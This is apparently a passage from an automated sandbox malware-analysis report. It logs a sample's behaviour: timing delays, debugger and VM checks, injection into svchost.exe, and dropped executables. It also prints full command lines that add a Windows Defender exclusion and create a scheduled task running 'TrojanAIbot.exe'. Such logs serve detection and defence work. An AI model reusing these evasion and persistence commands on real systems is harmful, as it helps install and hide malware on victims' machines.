                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99556
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99397
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99280
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98375
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98172
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98046
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97937
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97815
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97669
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97560
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97450
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97334
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97203
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97093
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96984
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96875
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96766
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96656
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96547
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96437
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99874
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99536
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99410
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99054
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98903
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98781
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98672
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98562
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98451
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98328
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98203
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98094
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97984
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97875
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97765
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97656
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97547
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97436
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97328
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97219
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97109
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97000
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96872
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96750
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96599
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1200000
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199790
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199683
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199484
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199375
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199265
                                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                                Source: x.exe, 00000004.00000002.1566684491.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\3
                                Source: x.exe, 00000009.00000002.1650531483.0000000000928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\K
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_2-86878
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045A370 BlockInput,2_2_0045A370
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress,2_2_0040EBD0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_047392F0 mov eax, dword ptr fs:[00000030h]2_2_047392F0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_04739290 mov eax, dword ptr fs:[00000030h]2_2_04739290
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_04737C50 mov eax, dword ptr fs:[00000030h]2_2_04737C50
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_04844500 mov eax, dword ptr fs:[00000030h]4_2_04844500
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_04845BA0 mov eax, dword ptr fs:[00000030h]4_2_04845BA0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_04845B40 mov eax, dword ptr fs:[00000030h]4_2_04845B40
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_04937518 mov eax, dword ptr fs:[00000030h]6_2_04937518
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_049374B8 mov eax, dword ptr fs:[00000030h]6_2_049374B8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_04935E78 mov eax, dword ptr fs:[00000030h]6_2_04935E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 9_2_04B5C4B8 mov eax, dword ptr fs:[00000030h]9_2_04B5C4B8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 9_2_04B5C518 mov eax, dword ptr fs:[00000030h]9_2_04B5C518
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 9_2_04B5AE78 mov eax, dword ptr fs:[00000030h]9_2_04B5AE78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 13_2_04B5B4B8 mov eax, dword ptr fs:[00000030h]13_2_04B5B4B8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 13_2_04B5B518 mov eax, dword ptr fs:[00000030h]13_2_04B5B518
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 13_2_04B59E78 mov eax, dword ptr fs:[00000030h]13_2_04B59E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 15_2_049A9518 mov eax, dword ptr fs:[00000030h]15_2_049A9518
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 15_2_049A94B8 mov eax, dword ptr fs:[00000030h]15_2_049A94B8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 15_2_049A7E78 mov eax, dword ptr fs:[00000030h]15_2_049A7E78
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0050B794 mov eax, dword ptr fs:[00000030h]16_2_0050B794
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F71130 mov eax, dword ptr fs:[00000030h]16_2_00F71130
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB3F3D mov eax, dword ptr fs:[00000030h]16_2_00FB3F3D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_004238DA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041F250 SetUnhandledExceptionFilter,4_2_0041F250
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041A208
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00417DAA
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0040160F SetUnhandledExceptionFilter,16_2_0040160F
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0040160F SetUnhandledExceptionFilter,16_2_0040160F
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00FB1361
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00FB4C7B
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\wscript.exeFile created: x.exe.1.drJump to dropped file
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                                Maps a DLL or memory area into another process
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                                Writes to foreign memory regions
                                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B86008Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00436CD7 LogonUserW,2_2_00436CD7
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,2_2_0043333C
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00446124
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,16_2_00F98550
                                Source: x.exeBinary or memory string: Shell_TrayWnd
                                Source: wscript.exe, 00000001.00000003.1495166445.00000192DDBA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1494715225.00000192E02E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1488192028.00000192E02E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
